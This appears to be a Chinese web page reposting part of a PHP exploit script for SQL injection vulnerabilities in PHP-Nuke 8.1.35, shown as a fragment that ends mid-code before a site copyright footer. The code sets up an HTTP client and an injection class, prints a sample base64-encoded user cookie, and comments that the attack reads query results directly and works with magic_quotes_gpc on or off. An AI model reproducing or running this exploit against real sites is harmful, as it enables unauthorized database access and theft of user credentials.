Nuke多个SQL注入漏洞(2)

die("A user's cookie is required for 8.1.35 : ./php_exploit -t -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n"); 

$attack_url=str_replace("index.php","",$attack_url); 

$http=new http_client(); 

$sex=new php_nuke_blind_sql_injection($attack_url."/"); 

if(!$admin_cookie){ 

//This is what a cookie looks like: 

//2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096 

//$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"; 

if($user_cookie){ 

print "Using cookie...\n"; 

$http->cookie=$user_cookie; 

//1337+30000 is used as a pivot in parsing,  and to test for a sucessful injection. 

//This is NOT Blind SQL Injection,  we will be reading the result.  This attack works with magic_quotes_gpc on or off. 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwpyds.html